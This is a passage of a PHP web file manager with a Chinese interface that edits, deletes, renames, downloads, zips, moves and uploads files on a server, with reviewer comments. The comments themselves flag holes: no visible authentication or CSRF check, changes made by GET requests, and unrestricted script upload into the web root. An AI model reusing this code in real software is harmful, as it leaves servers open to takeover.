'">'; echo '<textarea name="content" style="width:100%; height:400px; font-family:monospace; padding:10px;">' . htmlspecialchars($content) . '</textarea>'; echo '<div style="margin:10px 0;">'; echo '<button type="submit" style="text-decoration:none;color:inherit;">保存</button>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">取消</a></button>'; echo '</div>'; echo '</form>'; } } } else { echo '<p>这不是一个文件</p>'; } echo '<div style="margin-top:20px;">'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '</div>'; break; case 'save_edit': try { if ($_SERVER['REQUEST_METHOD'] !== 'POST') { throw new Exception("无效的请求方法"); } $encryptedPath = isset($_POST['path']) ? $_POST['path'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少文件路径"); } $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径"); } // 权限检查 if (! is_writable($path)) { throw new Exception("文件不可写"); } if (! is_file($path)) { throw new Exception("不是文件"); } if (file_put_contents($path, $content) === false) { throw new Exception("保存失败"); } $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div class="success">文件保存成功!</div>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode($encryptedPath) . '" style="text-decoration:none;color:inherit;">继续编辑</a></button>'; } catch (Exception $e) { echo '<div class="error">保存失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . 
urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'preview_image': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path) || ! is_file($path)) { header('HTTP/1.0 404 Not Found'); exit; } // 权限检查 if (! is_readable($path)) { header('HTTP/1.0 403 Forbidden'); exit; } $mime = getMimeType($path); header('Content-Type: ' . (! empty($mime) ? $mime : 'application/octet-stream')); header('Content-Length: ' . filesize($path)); readfile($path); exit; } catch (Exception $e) { header('HTTP/1.0 500 Internal Server Error'); exit; } break; case 'epreview_imag': $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path) || ! is_file($path)) { header('HTTP/1.0 404 Not Found'); exit; } $mime = getMimeType($path); header('Content-Type: ' . (! empty($mime) ? $mime : 'application/octet-stream')); header('Content-Length: ' . filesize($path)); readfile($path); exit; break; case 'save_edit': try { if ($_SERVER['REQUEST_METHOD'] !== 'POST') { throw new Exception("无效的请求方法"); } $encryptedPath = isset($_POST['path']) ? $_POST['path'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少文件路径"); } $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径"); } // 权限检查 if (! is_writable($path)) { throw new Exception("文件不可写"); } if (! is_file($path)) { throw new Exception("不是文件"); } if (file_put_contents($path, $content) === false) { throw new Exception("保存失败"); } $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div class="success">文件保存成功!</div>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode($encryptedPath) . 
'" style="text-decoration:none;color:inherit;">继续编辑</a></button>'; } catch (Exception $e) { echo '<div class="error">保存失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'sc': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径!"); } // 权限检查 if (! is_writable(dirname($path))) { throw new Exception("没有删除权限"); } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); $protected = [realpath('/'), realpath($_SERVER['DOCUMENT_ROOT'])]; if (in_array(realpath($path), $protected)) { throw new Exception("不能删除系统重要目录!"); } if (! file_exists($path)) { throw new Exception("文件或目录不存在!"); } $msg = ""; if (is_dir($path)) { if (deleteDirectory($path)) { $msg = "目录删除成功!"; } else { throw new Exception("目录删除失败!"); } } else { if (unlink($path)) { $msg = "文件删除成功!"; } else { throw new Exception("文件删除失败!"); } } echo '<div class="success">' . $msg . '</div>'; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } catch (Exception $e) { echo '<div class="error">删除出错:' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'rename_form': $encryptedPath = urldecode($_GET['old_path']); $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { die("非法路径!"); } $fileName = basename($path); $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div style="margin:20px;"> <h3>重命名文件/目录</h3> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="rename"> <input type="hidden" name="old_path" value="' . htmlspecialchars($encryptedPath) . '"> <p>原名称: ' . 
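htmlspecialchars($fileName) . '</p> <p>新名称: <input type="text" name="new_name" value="' . htmlspecialchars($fileName) . '"></p> <button type="submit">确认重命名</button> <a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">取消</a> </form> </div>';
                break;

            // NOTE(security): every action below is driven by request parameters, and
            // most of them change the filesystem in response to a plain GET request.
            // No login or CSRF-token check is visible in this part of the file; confirm
            // that one runs before this switch is reached.
            // The encrypted path parameter is not an authorization token: aesDecrypt()
            // (defined earlier in the file) is AES-256-CBC without an integrity check and
            // the key is a constant in the source, so the decrypted value is treated as
            // attacker-controlled and re-validated in every case.
            // Each case is laid out one statement per line because the single-line form
            // lets a `//` comment swallow the statements that follow it.

            case 'rename':
                // Rename the entry named by old_path to new_name, then return to its parent listing.
                try {
                    $encryptedPath = isset($_GET['old_path']) ? $_GET['old_path'] : '';
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少原路径参数");
                    }
                    $newName = trim(isset($_GET['new_name']) ? $_GET['new_name'] : '');
                    if (empty($newName)) {
                        throw new Exception("新名称不能为空");
                    }
                    $oldPath = aesDecrypt($encryptedPath, $encryptionKey);
                    // aesDecrypt() returns false when decryption fails; reject that before path validation.
                    if (! is_string($oldPath) || $oldPath === '' || ! isValidPath($oldPath)) {
                        throw new Exception("非法路径!");
                    }
                    $parentDir = dirname($oldPath);
                    $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey);
                    // safeRename() applies its own base-directory and file-name checks.
                    safeRename($oldPath, $newName);
                    header('Location: ?a=index&b=list&path=' . urlencode($encryptedParentPath));
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">重命名失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    // $path is a plaintext path; encrypt it so the link decrypts and does not expose it.
                    $returnPath = isset($encryptedParentPath) ? $encryptedParentPath : aesEncrypt($path, $encryptionKey);
                    echo '<a href="?a=index&b=list&path=' . urlencode($returnPath) . '">返回</a>';
                }
                break;

            case 'xz':
                // Stream one file under DOCUMENT_ROOT to the client as an attachment.
                try {
                    $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                    $path = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($path) || $path === '' || ! isValidPath($path)) {
                        throw new Exception("非法路径!");
                    }
                    // Permission checks
                    if (! is_readable($path)) {
                        throw new Exception("没有读取文件权限");
                    }
                    if (! is_file($path)) {
                        throw new Exception("路径不是文件");
                    }
                    $parentPath = dirname($path);
                    $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey);
                    $file = preg_replace('/[\x00-\x1F\x7F]/', '', $path);
                    $realFile = realpath($file);
                    if (! $realFile) {
                        throw new Exception("文件路径解析失败: $file");
                    }
                    if (! file_exists($realFile)) {
                        throw new Exception("文件不存在: $realFile");
                    }
                    // Confine to DOCUMENT_ROOT. The prefix carries a trailing separator so that a
                    // sibling such as "<root>_backup" does not match, and an unresolvable root
                    // denies access instead of turning into an empty prefix that matches everything.
                    $baseDir = realpath($_SERVER['DOCUMENT_ROOT']);
                    $basePrefix = $baseDir === false ? false : rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR;
                    if ($basePrefix === false || ($realFile !== $baseDir && strpos($realFile, $basePrefix) !== 0)) {
                        throw new Exception("不允许访问该路径的文件");
                    }
                    // Download response headers. Quotes and backslashes are replaced so the
                    // file name cannot break out of the quoted filename parameter.
                    $downloadName = str_replace(['"', '\\'], '_', basename($file));
                    header('Content-Type: application/octet-stream');
                    header('X-Content-Type-Options: nosniff');
                    header('Content-Disposition: attachment; filename="' . $downloadName . '"');
                    header('Content-Length: ' . filesize($realFile));
                    // ob_clean() is only valid while an output buffer is active.
                    if (ob_get_level() > 0) {
                        ob_clean();
                    }
                    flush();
                    readfile($realFile);
                    exit;
                } catch (Exception $e) {
                    echo '<div class="error">下载失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    if (isset($encryptedParentPath)) {
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>';
                    }
                }
                break;

            case 'ys':
                // Create "<path>.zip" next to the selected file or directory.
                // NOTE(review): an existing archive with that name is overwritten, and the
                // archive is written beside the source, so it is served like any other file there.
                try {
                    $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                    $path = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($path) || $path === '' || ! isValidPath($path)) {
                        throw new Exception("非法路径!");
                    }
                    // Permission checks
                    if (! is_readable($path)) {
                        throw new Exception("没有读取权限");
                    }
                    if (! is_writable(dirname($path))) {
                        throw new Exception("没有写入权限");
                    }
                    $parentPath = dirname($path);
                    $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey);
                    if (! file_exists($path)) {
                        throw new Exception("文件不存在!");
                    }
                    $zipPath = $path . '.zip';
                    $zip = new ZipArchive();
                    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
                        throw new Exception("无法创建压缩文件!");
                    }
                    if (is_dir($path)) {
                        addFolderToZip($zip, $path, basename($path));
                    } else {
                        $zip->addFile($path, basename($path));
                    }
                    $zip->close();
                    echo '<div class="success">压缩成功!</div>';
                    echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>';
                } catch (Exception $e) {
                    echo '<div class="error">压缩出错:' . htmlspecialchars($e->getMessage()) . '</div>';
                    if (isset($encryptedParentPath)) {
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>';
                    }
                }
                break;

            case 'copy':
                // Remember a source under DOCUMENT_ROOT in the session for a later 'paste'.
                try {
                    // NOTE(review): $_GET values are already URL-decoded by PHP; this second
                    // urldecode() turns a "+" in the base64 token into a space. Confirm the
                    // links that lead here are double-encoded, otherwise drop the call.
                    $encryptedPath = urldecode(isset($_GET['source_path']) ? $_GET['source_path'] : '');
                    // Check for the missing parameter before attempting to decrypt it.
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少源文件路径");
                    }
                    $sourcePath = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($sourcePath) || $sourcePath === '' || ! isValidPath($sourcePath)) {
                        throw new Exception("非法路径!");
                    }
                    $realSource = realpath($sourcePath);
                    if ($realSource === false) {
                        throw new Exception("源文件不存在");
                    }
                    // Same DOCUMENT_ROOT confinement as the download case (separator-terminated prefix).
                    $baseDir = realpath($_SERVER['DOCUMENT_ROOT']);
                    $basePrefix = $baseDir === false ? false : rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR;
                    if ($basePrefix === false || ($realSource !== $baseDir && strpos($realSource, $basePrefix) !== 0)) {
                        throw new Exception("不允许操作该路径");
                    }
                    // The session is started at the top of the file; only start it if it is not active.
                    if (session_status() !== PHP_SESSION_ACTIVE) {
                        session_start();
                    }
                    $_SESSION['copy_source'] = $realSource;
                    $_SESSION['copy_source_encrypted'] = $encryptedPath;
                    $_SESSION['operation_type'] = 'copy';
                    $currentDir = dirname($realSource);
                    $encryptedCurrentPath = aesEncrypt($currentDir, $encryptionKey);
                    $fileName = basename($realSource);
                    // Redirect while headers can still be sent; output written first would make
                    // header() fail. Fall back to the on-page notice only when it is too late.
                    if (! headers_sent()) {
                        header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentPath));
                        exit;
                    }
                    echo '<div style="color:green; padding:10px; background:#d4edda; border:1px solid #c3e6cb;">';
                    echo '已复制: ' . htmlspecialchars($fileName) . ' - 请导航到目标目录后点击"粘贴"按钮';
                    echo '</div>';
                    echo '<a href="?a=index&b=list&path=' . urlencode($encryptedCurrentPath) . '">返回</a>';
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">复制失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    // Always link with an encrypted path; $path itself is plaintext.
                    $returnPath = aesEncrypt(isset($currentDir) ? $currentDir : $path, $encryptionKey);
                    echo '<a href="?a=index&b=list&path=' . urlencode($returnPath) . '">返回</a>';
                }
                break;

            case 'cut':
                // Same as 'copy', but marks the pending operation as a move.
                try {
                    // NOTE(review): see the urldecode() remark in the 'copy' case.
                    $encryptedPath = urldecode(isset($_GET['source_path']) ? $_GET['source_path'] : '');
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少源文件路径");
                    }
                    $sourcePath = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($sourcePath) || $sourcePath === '' || ! isValidPath($sourcePath)) {
                        throw new Exception("非法路径!");
                    }
                    $realSource = realpath($sourcePath);
                    if ($realSource === false) {
                        throw new Exception("源文件不存在");
                    }
                    $baseDir = realpath($_SERVER['DOCUMENT_ROOT']);
                    $basePrefix = $baseDir === false ? false : rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR;
                    if ($basePrefix === false || ($realSource !== $baseDir && strpos($realSource, $basePrefix) !== 0)) {
                        throw new Exception("不允许操作该路径");
                    }
                    if (session_status() !== PHP_SESSION_ACTIVE) {
                        session_start();
                    }
                    $_SESSION['copy_source'] = $realSource;
                    $_SESSION['copy_source_encrypted'] = $encryptedPath;
                    $_SESSION['operation_type'] = 'cut';
                    $currentDir = dirname($realSource);
                    $encryptedCurrentPath = aesEncrypt($currentDir, $encryptionKey);
                    $fileName = basename($realSource);
                    if (! headers_sent()) {
                        header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentPath));
                        exit;
                    }
                    echo '<div style="color:green; padding:10px; background:#d4edda; border:1px solid #c3e6cb;">';
                    echo '已剪切: ' . htmlspecialchars($fileName) . ' - 请导航到目标目录后点击"粘贴"按钮';
                    echo '</div>';
                    echo '<a href="?a=index&b=list&path=' . urlencode($encryptedCurrentPath) . '">返回</a>';
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">剪切失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    $returnPath = aesEncrypt(isset($currentDir) ? $currentDir : $path, $encryptionKey);
                    echo '<a href="?a=index&b=list&path=' . urlencode($returnPath) . '">返回</a>';
                }
                break;

            case 'paste':
                // Copy or move the session-stored source into the directory named by `path`.
                // NOTE(review): the target is checked with isValidPath() only, while 'copy',
                // 'cut', 'upload' and 'search' also confine their path to DOCUMENT_ROOT.
                // Confirm that writing anywhere isValidPath() accepts is intended.
                try {
                    if (session_status() !== PHP_SESSION_ACTIVE) {
                        session_start();
                    }
                    if (! isset($_SESSION['copy_source']) || ! file_exists($_SESSION['copy_source'])) {
                        throw new Exception("没有可粘贴的项目");
                    }
                    $sourcePath = $_SESSION['copy_source'];
                    $operationType = isset($_SESSION['operation_type']) ? $_SESSION['operation_type'] : '';
                    $isCut = ($operationType === 'cut');
                    $realSource = realpath($sourcePath);
                    if ($realSource === false || ! file_exists($realSource)) {
                        throw new Exception("源文件不存在或已被移动");
                    }
                    $encryptedTargetDir = isset($_GET['path']) ? $_GET['path'] : '';
                    if (empty($encryptedTargetDir)) {
                        throw new Exception("缺少目标路径参数");
                    }
                    $targetDir = aesDecrypt($encryptedTargetDir, $encryptionKey);
                    if (! is_string($targetDir) || $targetDir === '' || ! isValidPath($targetDir)) {
                        throw new Exception("非法目标路径");
                    }
                    $realTargetDir = realpath($targetDir);
                    // The target has to be an existing directory, not just an existing path.
                    if ($realTargetDir === false || ! is_dir($realTargetDir)) {
                        throw new Exception("目标目录不存在");
                    }
                    if ($realSource === $realTargetDir) {
                        throw new Exception("不能移动到自身");
                    }
                    // Compare against "<source>/" so a sibling that merely shares the name
                    // prefix (e.g. "foo" and "foobar") is not mistaken for a subdirectory.
                    $sourcePrefix = rtrim($realSource, '/\\') . DIRECTORY_SEPARATOR;
                    if (is_dir($realSource) && strpos($realTargetDir, $sourcePrefix) === 0) {
                        throw new Exception("不能移动到自己的子目录");
                    }
                    $fileName = basename($realSource);
                    $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $fileName;
                    if (file_exists($targetPath)) {
                        // Name collision: try "<name>_<n><ext>" with a bounded number of attempts.
                        $counter = 1;
                        $fileInfo = pathinfo($fileName);
                        $baseName = $fileInfo['filename'];
                        $extension = isset($fileInfo['extension']) ? '.' . $fileInfo['extension'] : '';
                        while (file_exists($targetPath)) {
                            $newFileName = $baseName . '_' . $counter . $extension;
                            $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $newFileName;
                            $counter++;
                            if ($counter > 100) {
                                throw new Exception("无法生成唯一的文件名");
                            }
                        }
                    }
                    $sourceIsDir = is_dir($realSource);
                    if ($isCut) {
                        if (! rename($realSource, $targetPath)) {
                            throw new Exception($sourceIsDir ? "移动目录失败" : "移动文件失败");
                        }
                    } elseif ($sourceIsDir) {
                        if (! copyDirectory($realSource, $targetPath)) {
                            throw new Exception("复制目录失败");
                        }
                    } elseif (! copy($realSource, $targetPath)) {
                        throw new Exception("复制文件失败");
                    }
                    unset($_SESSION['copy_source']);
                    unset($_SESSION['copy_source_encrypted']);
                    unset($_SESSION['operation_type']);
                    $operationText = $isCut ? '移动' : '复制';
                    // Open the element that the closing tag below belongs to.
                    echo '<div>';
                    echo $operationText . '成功: ' . htmlspecialchars($fileName);
                    echo '</div>';
                    echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedTargetDir) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>';
                } catch (Exception $e) {
                    echo '<div>粘贴失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    // Fall back to the current listing path, encrypted like every other link.
                    $returnPath = ! empty($encryptedTargetDir) ? $encryptedTargetDir : aesEncrypt($path, $encryptionKey);
                    echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($returnPath) . '" style="text-decoration:none;color:inherit;">返回</a></button>';
                }
                break;

            case 'cancel_cut':
                // Drop the pending copy/cut state and return to the listing.
                unset($_SESSION['copy_source']);
                unset($_SESSION['copy_source_encrypted']);
                unset($_SESSION['operation_type']);
                $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                if (empty($encryptedPath)) {
                    $encryptedPath = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey);
                }
                header('Location: ?a=index&b=list&path=' . urlencode($encryptedPath));
                exit;
                break;

            case 'create_file':
                // Create an empty file named `filename` in the directory named by `path`.
                try {
                    $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少目录参数");
                    }
                    $currentDir = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($currentDir) || $currentDir === '' || ! isValidPath($currentDir)) {
                        throw new Exception("非法路径!");
                    }
                    $filename = trim(isset($_GET['filename']) ? $_GET['filename'] : '');
                    if (empty($filename)) {
                        throw new Exception("文件名不能为空");
                    }
                    // Path separators and other reserved characters are refused, so the
                    // new entry cannot be placed outside $currentDir.
                    if (preg_match('/[\/\\\\:\*\?"<>\|]/', $filename)) {
                        throw new Exception("文件名包含非法字符");
                    }
                    $filePath = $currentDir . DIRECTORY_SEPARATOR . $filename;
                    if (file_exists($filePath)) {
                        throw new Exception("文件已存在");
                    }
                    if (! touch($filePath)) {
                        throw new Exception("文件创建失败");
                    }
                    chmod($filePath, 0644);
                    $encryptedCurrentDir = aesEncrypt($currentDir, $encryptionKey);
                    header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentDir));
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">创建文件失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : '';
                    echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>';
                }
                break;

            case 'create_folder':
                // Create a directory named `foldername` in the directory named by `path`.
                try {
                    $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少目录参数");
                    }
                    $currentDir = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($currentDir) || $currentDir === '' || ! isValidPath($currentDir)) {
                        throw new Exception("非法路径!");
                    }
                    $foldername = trim(isset($_GET['foldername']) ? $_GET['foldername'] : '');
                    if (empty($foldername)) {
                        throw new Exception("文件夹名不能为空");
                    }
                    if (preg_match('/[\/\\\\:\*\?"<>\|]/', $foldername)) {
                        throw new Exception("文件夹名包含非法字符");
                    }
                    $folderPath = $currentDir . DIRECTORY_SEPARATOR . $foldername;
                    if (file_exists($folderPath)) {
                        throw new Exception("文件夹已存在");
                    }
                    if (! mkdir($folderPath, 0755, true)) {
                        throw new Exception("文件夹创建失败");
                    }
                    $encryptedCurrentDir = aesEncrypt($currentDir, $encryptionKey);
                    header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentDir));
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">创建文件夹失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : '';
                    echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>';
                }
                break;

            case 'upload':
                // Store one uploaded file in a directory under DOCUMENT_ROOT.
                // NOTE(security): the file type is not restricted. Anything written under
                // DOCUMENT_ROOT is served by the web server, including script files, so this
                // endpoint must be reachable by authenticated administrators only. If that
                // cannot be guaranteed, add an extension allow-list and store uploads in a
                // directory the server does not execute from.
                try {
                    if (! isset($_FILES['upload_file']) || $_FILES['upload_file']['error'] === UPLOAD_ERR_NO_FILE) {
                        throw new Exception("没有选择要上传的文件");
                    }
                    $uploadFile = $_FILES['upload_file'];
                    $encryptedPath = isset($_POST['path']) ? $_POST['path'] : '';
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少路径参数");
                    }
                    $targetDir = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! is_string($targetDir) || $targetDir === '' || ! isValidPath($targetDir)) {
                        throw new Exception("非法路径!");
                    }
                    $realTargetDir = realpath($targetDir);
                    if ($realTargetDir === false) {
                        throw new Exception("目标目录不存在");
                    }
                    if ($uploadFile['error'] !== UPLOAD_ERR_OK) {
                        $errorMessages = [
                            UPLOAD_ERR_INI_SIZE => '文件大小超过服务器限制',
                            UPLOAD_ERR_FORM_SIZE => '文件大小超过表单限制',
                            UPLOAD_ERR_PARTIAL => '文件只有部分被上传',
                            UPLOAD_ERR_NO_FILE => '没有文件被上传',
                            UPLOAD_ERR_NO_TMP_DIR => '缺少临时文件夹',
                            UPLOAD_ERR_CANT_WRITE => '写入磁盘失败',
                            UPLOAD_ERR_EXTENSION => 'PHP扩展阻止了文件上传',
                        ];
                        throw new Exception(isset($errorMessages[$uploadFile['error']]) ? $errorMessages[$uploadFile['error']] : "未知上传错误");
                    }
                    // Separator-terminated prefix, and deny when the root cannot be resolved.
                    $baseDir = realpath($_SERVER['DOCUMENT_ROOT']);
                    $basePrefix = $baseDir === false ? false : rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR;
                    if ($basePrefix === false || ($realTargetDir !== $baseDir && strpos($realTargetDir, $basePrefix) !== 0)) {
                        throw new Exception("不允许上传到该目录");
                    }
                    // The client-supplied name is reduced to its last component before use.
                    $fileName = basename($uploadFile['name']);
                    if (empty($fileName)) {
                        throw new Exception("无效的文件名");
                    }
                    if (preg_match('/[\/\\\\:\*\?"<>\|]/', $fileName)) {
                        throw new Exception("文件名包含非法字符");
                    }
                    $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $fileName;
                    if (file_exists($targetPath)) {
                        throw new Exception("文件已存在");
                    }
                    if (! is_uploaded_file($uploadFile['tmp_name'])) {
                        throw new Exception("非法文件来源");
                    }
                    if (! move_uploaded_file($uploadFile['tmp_name'], $targetPath)) {
                        throw new Exception("文件移动失败,请检查目录权限");
                    }
                    chmod($targetPath, 0644);
                    if (session_status() !== PHP_SESSION_ACTIVE) {
                        session_start();
                    }
                    if (! isset($_SESSION['upload_history'])) {
                        $_SESSION['upload_history'] = [];
                    }
                    $_SESSION['upload_history'][] = [
                        'filename' => $fileName,
                        'filepath' => $targetPath,
                        'upload_time' => date('Y-m-d H:i:s'),
                    ];
                    $encryptedTargetDir = aesEncrypt($realTargetDir, $encryptionKey);
                    header('Location: ?a=index&b=list&path=' . urlencode($encryptedTargetDir));
                    exit;
                } catch (Exception $e) {
                    echo '<div style="color:red;">上传失败: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    // $encryptedTargetDir is only assigned on success, so link back with the
                    // posted directory token; without one, link to the site root.
                    if (! empty($encryptedPath)) {
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>';
                    } else {
                        $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey);
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . '">返回</a>';
                    }
                }
                break;

            case 'search':
                // List entries found by searchFiles() for `keyword` below the directory named by `path`.
                try {
                    $keyword = trim(isset($_GET['keyword']) ? $_GET['keyword'] : '');
                    if (empty($keyword)) {
                        throw new Exception("请输入搜索关键词");
                    }
                    $encryptedPath = isset($_GET['path']) ? $_GET['path'] : '';
                    if (empty($encryptedPath)) {
                        throw new Exception("缺少路径参数");
                    }
                    $searchPath = aesDecrypt($encryptedPath, $encryptionKey);
                    if (! $searchPath) {
                        throw new Exception("路径解密失败");
                    }
                    if (! isValidPath($searchPath)) {
                        throw new Exception("非法路径!");
                    }
                    $realSearchPath = realpath($searchPath);
                    $baseDir = realpath($_SERVER['DOCUMENT_ROOT']);
                    $basePrefix = $baseDir === false ? false : rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR;
                    if ($realSearchPath === false
                        || $basePrefix === false
                        || ($realSearchPath !== $baseDir && strpos($realSearchPath, $basePrefix) !== 0)
                    ) {
                        throw new Exception("不允许搜索该目录");
                    }
                    // The keyword is echoed back, so it is HTML-escaped.
                    echo '<h2>搜索结果: ' . htmlspecialchars($keyword) . '</h2>';
                    $encryptedReturnPath = aesEncrypt($searchPath, $encryptionKey);
                    echo '<div class="navigation"> <a href="?a=index&b=list&path=' . urlencode($encryptedReturnPath) . '">返回文件列表</a> </div>';
                    $results = searchFiles($realSearchPath, $keyword);
                    if (empty($results)) {
                        echo '<p>没有找到匹配的文件</p>';
                    } else {
                        // Five header cells, matching the five cells written per row.
                        echo '<table border="1" cellpadding="6" cellspacing="0"> <tr><th>文件名</th><th>路径</th><th>大小</th><th>类型</th><th>操作</th></tr>';
                        foreach ($results as $file) {
                            $encryptedFilePath = aesEncrypt($file['path'], $encryptionKey);
                            $encryptedDirPath = aesEncrypt(dirname($file['path']), $encryptionKey);
                            $fileName = basename($file['path']);
                            echo '<tr> <td>' . htmlspecialchars($fileName) . '</td> <td>' . htmlspecialchars(dirname($file['path'])) . '</td> <td>' . formatSize($file['size']) . '</td> <td>' . ($file['is_dir'] ? '文件夹' : '文件') . '</td> <td> <a href="?a=index&b=list&path=' . urlencode($encryptedDirPath) . '">打开位置</a> | <a href="?a=index&b=ck&path=' . urlencode($encryptedFilePath) . '">查看</a> </td> </tr>';
                        }
                        echo '</table>';
                    }
                } catch (Exception $e) {
                    echo '<div style="color:red;">搜索错误: ' . htmlspecialchars($e->getMessage()) . '</div>';
                    // No $currentDir exists in this case; link back with the requested
                    // directory token when there is one, otherwise to the site root.
                    if (! empty($encryptedPath)) {
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>';
                    } else {
                        $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey);
                        echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . '">返回首页</a>';
                    }
                }
                break;
        }
        break;
}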